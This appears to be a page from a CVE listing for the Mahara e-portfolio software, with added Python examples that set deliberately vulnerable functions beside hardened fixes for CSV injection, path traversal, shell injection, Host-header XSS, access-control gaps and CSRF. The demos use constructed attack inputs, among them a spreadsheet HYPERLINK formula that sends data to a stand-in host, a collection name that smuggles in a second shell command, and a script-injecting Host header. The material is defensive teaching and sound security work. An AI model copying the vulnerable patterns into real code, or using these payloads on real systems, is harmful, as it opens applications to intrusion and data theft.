VYPR

Mahara

by Mahara (software)


CVEs (110)

  • CVE-2021-40848 (Nov 3, 2021)
    risk 0.00 cvss, epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exported CSV files could contain characters that a spreadsheet program could interpret as a command, leading to execution of a malicious string locally on a device, aka CSV injection.
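The class of bug above is fixed on the export side: any cell that begins with a formula trigger (=, +, -, @, tab, carriage return) must be neutralised before it reaches the spreadsheet. The following is an added example, not Mahara's own export code: it shows the neutralisation, an export routine that applies it, and an audit helper that parses an existing CSV (for instance one downloaded from an unpatched instance) and reports the cells a spreadsheet would evaluate. The sample rows are constructed.

```python
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
# Spreadsheets ignore leading whitespace when deciding, so the check strips it.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralise_cell(value):
    """Return a cell value that a spreadsheet will treat as literal text.

    A leading single quote is the conventional way to force text mode.
    Embedded quotes and separators are handled by the csv writer, which
    quotes the whole field (and doubles inner quotes), so a payload such as
    x",=cmd cannot break out of the field to start a new one.
    """
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows, header):
    """Write header + rows to CSV text with every data cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)          # header fields are application constants
    for row in rows:
        writer.writerow(neutralise_cell(v) for v in row)
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit helper: parse CSV text and return (row, col) of cells that a
    spreadsheet would evaluate as formulas. Empty list means the export is clean."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.lstrip().startswith(FORMULA_TRIGGERS):
                hits.append((r, c))
    return hits


if __name__ == "__main__":
    # Constructed sample: a display name chosen by a malicious user.
    rows = [['=HYPERLINK("http://evil.example/?"&A1,"click")', "bob"],
            ["alice", "Alice Example"]]
    out = export_rows(rows, ["username", "displayname"])
    print(out)
    print("formula cells after neutralisation:", find_formula_cells(out))
```

Note the trade-off: a genuinely numeric cell such as -5 also gets the quote prefix, so if an export column is meant to be numeric the caller should cast it rather than pass it through as text. The audit helper is useful during incident triage: run it over CSVs users have already downloaded to decide whether a payload was ever delivered.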

  • CVE-2021-43264 (Nov 2, 2021)
    risk 0.00 cvss, epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, adjusting the path component for the page help file allows attackers to bypass the intended access control for HTML files via directory traversal. The application replaces the - character in that path component with the / character.
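The dangerous step is turning a request parameter into directory separators and then joining it onto a base directory without checking what comes out. The following is an added example, not Mahara's own help-file loader: the help directory, the parameter name and the file layout are assumed. It shows a resolver with the described behaviour next to a hardened one that allowlists each segment and, as defence in depth, verifies the normalised result still lies under the help root.

```python
import posixpath
import re

# Assumed layout for the demonstration; not taken from Mahara.
HELP_ROOT = "/var/www/mahara/htdocs/lang/en.utf8/help"

# Each hyphen-separated segment may only be a plain identifier: no dots,
# no slashes, so ".." can never appear as a segment.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_]+$")


def help_path_vulnerable(root, page):
    """Mimics the flaw: '-' becomes '/', so '..-..-x' walks up two directories.
    Nothing checks that the result stays inside root."""
    return posixpath.join(root, page.replace("-", "/") + ".html")


def help_path_hardened(root, page):
    """Allowlist every segment, then confirm containment after normalisation."""
    segments = page.split("-")
    if not segments or not all(SAFE_SEGMENT.match(s) for s in segments):
        raise ValueError("invalid help page name: %r" % page)
    candidate = posixpath.normpath(posixpath.join(root, *segments) + ".html")
    # Belt and braces: even if the allowlist were loosened later, a path that
    # normalises to something outside root is refused.
    if not candidate.startswith(root.rstrip("/") + "/"):
        raise ValueError("path escapes help root: %r" % candidate)
    return candidate


if __name__ == "__main__":
    # Constructed attacker input: climbs out of the help directory but still
    # ends in .html, so it targets HTML files that were never meant to be served.
    evil = "..-..-private-secret"
    print("vulnerable:", posixpath.normpath(help_path_vulnerable(HELP_ROOT, evil)))
    print("hardened:  ", help_path_hardened(HELP_ROOT, "view-edit"))
    try:
        help_path_hardened(HELP_ROOT, evil)
    except ValueError as exc:
        print("hardened rejected:", exc)
```

The allowlist alone is sufficient; the containment check exists so that a future change to the allowlist (say, permitting dots in names) does not silently reopen the traversal. On a real filesystem you would apply the same check to `os.path.realpath` so that symlinks under the help root cannot point outside it either.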

  • CVE-2021-43265 (Nov 2, 2021)
    risk 0.00 cvss, epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, certain tag syntax could be used for XSS, such as via a SCRIPT element.

  • CVE-2021-43266 (Nov 2, 2021)
    risk 0.00 cvss, epss 0.01

    In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exporting collections via PDF export could lead to code execution via shell metacharacters in a collection name. Additionally, in Mahara before 20.10.4, 21.04.3, and 21.10.1, exporting collections via PDF export could cause…
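Shell metacharacters only matter when user text is interpolated into a command line that a shell parses. The following is an added example, not Mahara's PDF exporter; the converter binary `html2pdf` and the output directory are hypothetical. It builds the command the vulnerable way, tokenises it the way a POSIX shell would to show the collection name becoming a second command, and then builds it the hardened way as an argv list (no shell) with the name reduced to a safe filename.

```python
import os
import re
import shlex
import subprocess

OUT_DIR = "/tmp/export"   # hypothetical export directory


def build_command_vulnerable(collection_name, html_path):
    """String interpolation into a shell command line. The shell parses the
    collection name, so ';' '|' '&' '$(...)' become extra commands."""
    return f"html2pdf {html_path} {OUT_DIR}/{collection_name}.pdf"


def shell_commands(command_line):
    """Split a command line into the separate commands a POSIX shell would run,
    using shlex in punctuation mode so ';', '&&', '||', '|' are separators."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
                current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_command_hardened(collection_name, html_path):
    """Return argv for subprocess.run(..., shell=False): the name is one argument,
    never parsed by a shell, and is reduced to a filename-safe form."""
    safe_name = re.sub(r"[^A-Za-z0-9._ -]", "_", collection_name).strip()[:100]
    safe_name = safe_name or "collection"
    # Joining onto an absolute directory also means the argument can never start
    # with '-', so a name like "-oops" cannot be read as an option by the tool.
    out_path = os.path.join(OUT_DIR, safe_name + ".pdf")
    return ["html2pdf", html_path, out_path]


def run_export(collection_name, html_path):
    """Execute the hardened form. Not called in the demo below."""
    return subprocess.run(build_command_hardened(collection_name, html_path), check=True)


if __name__ == "__main__":
    # Constructed attacker-chosen collection name.
    name = "Thesis; touch /tmp/pwned"
    for cmd in shell_commands(build_command_vulnerable(name, "/tmp/in.html")):
        print("shell would run:", cmd)
    print("hardened argv:   ", build_command_hardened(name, "/tmp/in.html"))
```

If the export really must go through a shell (a wrapper script, for example), quote every user-derived argument with `shlex.quote`; but passing an argv list with `shell=False` removes the parsing step entirely, which is the fix that cannot be undone by a later edit to the command string.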

  • CVE-2021-29349 (Mar 31, 2021)
    risk 0.00 cvss, epss 0.02

    Mahara 20.10 is affected by Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox-mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft a module/multirecipientnotification/inbox.php…

  • CVE-2020-15907 (Aug 7, 2020)
    risk 0.00 cvss, epss 0.01

    In Mahara 19.04 before 19.04.6, 19.10 before 19.10.4, and 20.04 before 20.04.1, certain places could execute file or folder names containing JavaScript.

  • CVE-2020-9387 (Apr 30, 2020)
    risk 0.00 cvss, epss 0.01

    In Mahara 19.04 before 19.04.5 and 19.10 before 19.10.3, account details are shared in the Elasticsearch results for accounts that are not accessible when the config setting 'Isolated institutions' is turned on.

  • CVE-2020-9386 (Mar 9, 2020)
    risk 0.00 cvss, epss 0.01

    In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, file metadata information is disclosed to group members in the Elasticsearch result list despite them not having access to that artefact anymore.

  • CVE-2020-9282 (Mar 9, 2020)
    risk 0.00 cvss, epss 0.01

    In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, certain personal information is discoverable inspecting network responses on the 'Edit access' screen when sharing portfolios.

  • CVE-2013-1426 (Nov 7, 2019)
    risk 0.00 cvss, epss 0.01

    Cross-site Scripting (XSS) in Mahara before 1.5.9 and 1.6.x before 1.6.4 allows remote attackers to inject arbitrary web script or HTML via the TinyMCE editor.

  • CVE-2019-9708 (May 7, 2019)
    risk 0.00 cvss, epss 0.01

    An issue was discovered in Mahara 17.10 before 17.10.8, 18.04 before 18.04.4, and 18.10 before 18.10.1. A site administrator can suspend the system user (root), causing all users to be locked out from the system.

  • CVE-2019-9709 (May 7, 2019)
    risk 0.00 cvss, epss 0.01

    An issue was discovered in Mahara 17.10 before 17.10.8, 18.04 before 18.04.4, and 18.10 before 18.10.1. The collection title is vulnerable to Cross Site Scripting (XSS) due to not escaping it when viewing the collection's SmartEvidence overview page (if that feature is turned…

  • CVE-2013-4432 (May 19, 2014)
    risk 0.00 cvss, epss 0.01

    Mahara before 1.5.13, 1.6.x before 1.6.8, and 1.7.x before 1.7.4 does not properly restrict access to folders, which allows remote authenticated users to read arbitrary folders (1) by leveraging an active folder tab loaded before permissions were removed or (2) via the folder…

  • CVE-2013-4431 (May 19, 2014)
    risk 0.00 cvss, epss 0.01

    Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does not properly prevent access to blocks, which allows remote authenticated users to modify arbitrary blocks via the block id in an edit request.

  • CVE-2013-4430 (May 19, 2014)
    risk 0.00 cvss, epss 0.01

    Cross-site scripting (XSS) vulnerability in Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 allows remote attackers to inject arbitrary web script or HTML via the Host header to lib/web.php.
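Host-header XSS arises when server-side code treats the Host request header as trusted input (typically to build absolute URLs) and echoes it into HTML. Two independent fixes apply: validate Host against an allowlist of the names the site actually serves, and build self-referencing URLs from the configured site root rather than from the request. The following is an added example, not Mahara's lib/web.php; the configured root, the allowlist and the link-building functions are assumed for illustration, with a constructed WSGI-style `environ` as input.

```python
import html
from urllib.parse import urlsplit

# Assumed configuration, analogous to a site-root setting; not Mahara's values.
WWWROOT = "https://mahara.example.org/"
ALLOWED_HOSTS = {"mahara.example.org"}


def page_link_vulnerable(environ, path):
    """Builds the absolute URL from the client-controlled Host header and
    drops it into markup unescaped: a crafted Host lands in the page."""
    host = environ["HTTP_HOST"]
    return f'<a href="http://{host}/{path}">{host}</a>'


def request_host_ok(environ):
    """Allowlist check on the Host header (port stripped, case-folded).
    Run this early in request handling and refuse unknown hosts outright."""
    host = environ.get("HTTP_HOST", "").split(":", 1)[0].lower()
    return host in ALLOWED_HOSTS


def page_link_hardened(environ, path):
    """Refuse unexpected hosts, derive the URL from configuration, and escape
    everything that reaches HTML (escaping alone would stop the XSS; the
    allowlist also stops cache-poisoning and password-reset-link abuse)."""
    if not request_host_ok(environ):
        raise ValueError("unexpected Host header")
    url = WWWROOT + path.lstrip("/")
    label = urlsplit(WWWROOT).hostname
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(label))


if __name__ == "__main__":
    # Constructed request with a hostile Host header.
    evil = {"HTTP_HOST": 'mahara.example.org"><script>alert(1)</script>'}
    print(page_link_vulnerable(evil, "view/view.php"))
    print("host allowed:", request_host_ok(evil))
    print(page_link_hardened({"HTTP_HOST": "mahara.example.org"}, "/view/view.php"))
```

The allowlist belongs at the web server or framework layer (a default vhost that rejects unknown names, or the equivalent of an allowed-hosts setting) so that no individual page has to remember it.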

  • CVE-2013-4429 (May 19, 2014)
    risk 0.00 cvss, epss 0.01

    Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does not properly restrict access to artefacts, which allows remote authenticated users to read arbitrary artefacts via the (1) artefact id in an upload action when creating a journal or (2)…
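The three 2013 access-control entries (folders, blocks, artefacts reached by an id taken from the request) and the two Elasticsearch disclosure entries above (CVE-2020-9386, CVE-2020-9387) share one root cause: an object is looked up by identifier, or returned from a search index, without re-checking the requester's current permission on it. The following is an added example, not Mahara's access-control code; the artefact model, the store and the ACL rules are constructed for illustration. It shows the id-based edit with and without the ownership check, and a search post-filter that evaluates the live ACL on every hit so that a stale index cannot leak metadata after access is revoked.

```python
from dataclasses import dataclass, field


@dataclass
class Artefact:
    id: int
    owner: str
    title: str
    shared_with: set = field(default_factory=set)   # users granted view access


def sample_store():
    """Constructed data: a fresh copy per call so examples do not share state."""
    return {
        1: Artefact(1, "alice", "CV draft"),
        2: Artefact(2, "alice", "Reflection", shared_with={"carol"}),
        3: Artefact(3, "bob", "Thesis notes", shared_with={"carol"}),
    }


def can_view(user, art):
    return art.owner == user or user in art.shared_with


def can_edit(user, art):
    return art.owner == user


def edit_title_vulnerable(store, user, artefact_id, new_title):
    """Insecure direct object reference: the id from the request selects the
    row and `user` is never consulted, so any authenticated user edits anything."""
    art = store[artefact_id]
    art.title = new_title
    return art


def edit_title_hardened(store, user, artefact_id, new_title):
    """Authorise against the object actually loaded, not against the request."""
    art = store.get(artefact_id)
    if art is None or not can_edit(user, art):
        # Same error for 'missing' and 'forbidden' so ids cannot be enumerated.
        raise PermissionError(f"{user} may not edit artefact {artefact_id}")
    art.title = new_title
    return art


def filter_search_hits(store, user, hit_ids):
    """Post-filter search results with the current ACL. An index records who
    could see a document when it was indexed; permissions change afterwards,
    so the index is never the authority on what the requester may see now."""
    visible = []
    for artefact_id in hit_ids:
        art = store.get(artefact_id)
        if art is not None and can_view(user, art):
            visible.append(art)
    return visible


if __name__ == "__main__":
    store = sample_store()
    print(edit_title_vulnerable(store, "mallory", 1, "pwned"))
    store = sample_store()
    # Constructed stale index: built while carol still had access to 3.
    stale_index = {"carol": [2, 3]}
    store[3].shared_with.discard("carol")          # bob revokes access
    print([a.id for a in filter_search_hits(store, "carol", stale_index["carol"])])
```

Post-filtering has a cost: a page of results may shrink after filtering, so pagination has to be done after the ACL pass or by over-fetching. That is still preferable to trusting index-time permissions, which is exactly what the Elasticsearch entries describe going wrong.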

  • CVE-2012-6037 (Nov 24, 2012)
    risk 0.00 cvss, epss 0.02

    Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4, and other versions including 1.2, allow remote attackers to inject arbitrary web script or HTML via a CSV header with "unknown fields," which are not properly handled in…

  • CVE-2012-2253 (Nov 24, 2012)
    risk 0.00 cvss, epss 0.02

    Cross-site scripting (XSS) vulnerability in group/members.php in Mahara 1.5.x before 1.5.7 and 1.6.x before 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter.

  • CVE-2012-2247 (Nov 24, 2012)
    risk 0.00 cvss, epss 0.02

    Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to inject arbitrary web script or HTML via vectors related to artefact/file/ and a crafted SVG file.

  • CVE-2012-2246 (Nov 24, 2012)
    risk 0.00 cvss, epss 0.01

    Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to conduct clickjacking attacks to delete arbitrary users and bypass CSRF protection via account/delete.php.
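This entry and CVE-2021-29349 above (inbox.php deleting mail on a POST whose token is never checked) are two faces of the same control: a state-changing endpoint must require a per-session secret that a cross-site form cannot supply, and must refuse to be framed so that a click on the real page cannot be hijacked. The following is an added example, not Mahara's session or form code; the token parameter name `csrf_token`, the session dictionary and the inbox-deletion handler are hypothetical. It shows the handler with no token check beside the hardened one that validates the token in constant time and emits anti-framing headers.

```python
import hmac
import secrets

# Sent on every response from the hardened handler. X-Frame-Options covers
# older browsers; frame-ancestors is the current CSP directive.
ANTI_FRAMING_HEADERS = {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}


def issue_csrf_token(session):
    """One unguessable token per session, stored server-side and rendered into
    every state-changing form as a hidden field."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_token_valid(session, submitted):
    """Constant-time comparison so the check cannot be used as a timing oracle."""
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)


def delete_message_vulnerable(session, method, form, inbox):
    """Any POST deletes the message: a form on an attacker's site that targets
    this URL is submitted with the victim's cookies and succeeds."""
    if method == "POST":
        inbox.discard(form.get("msgid"))
    return 200, inbox, {}


def delete_message_hardened(session, method, form, inbox):
    """Require POST, require a valid session token, and refuse framing."""
    if method != "POST":
        return 405, inbox, ANTI_FRAMING_HEADERS
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, inbox, ANTI_FRAMING_HEADERS
    inbox.discard(form.get("msgid"))
    return 200, inbox, ANTI_FRAMING_HEADERS


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    # Constructed cross-site request: right cookies (session), no token.
    print(delete_message_vulnerable(session, "POST", {"msgid": "m1"}, {"m1", "m2"}))
    print(delete_message_hardened(session, "POST", {"msgid": "m1"}, {"m1", "m2"}))
    # Legitimate submission from the site's own form.
    print(delete_message_hardened(session, "POST",
                                  {"msgid": "m1", "csrf_token": token}, {"m1", "m2"}))
```

Setting the session cookie with `SameSite=Lax` (or `Strict`) is a useful second layer, but it is not a replacement: older clients ignore it, and a token check is what lets the server distinguish its own form from anyone else's.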

Page 4 of 6